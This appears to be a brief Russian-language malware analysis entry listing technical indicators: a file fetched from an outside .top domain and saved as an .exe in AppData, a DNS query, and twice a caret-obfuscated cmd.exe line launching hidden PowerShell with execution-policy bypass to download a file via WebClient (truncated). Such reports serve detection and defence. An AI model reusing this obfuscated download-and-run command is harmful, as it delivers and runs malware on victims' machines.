Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwE^rSh^ELL^.e^xe -E^XeC^U^tIoN^Po^LiCY^ ^By^PasS ^-^noP^rOfi^le -Wi^ND^o^WS^T^y^L^e^ ^hi^dD^En (N^e^W^-O^bJe^Ct System.NeT^.WEB^Clie^nT)^.dOwNlOad^fILE('http://www.doorasope.to...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "POwE^rSh^ELL^.e^xe -E^XeC^U^tIoN^Po^LiCY^ ^By^PasS ^-^noP^rOfi^le -Wi^ND^o^WS^T^y^L^e^ ^hi^dD^En (N^e^W^-O^bJe^Ct System.NeT^.WEB^Clie^nT)^.dOwNlOad^fILE('http://www.doorasope.to...' (со скрытым окном)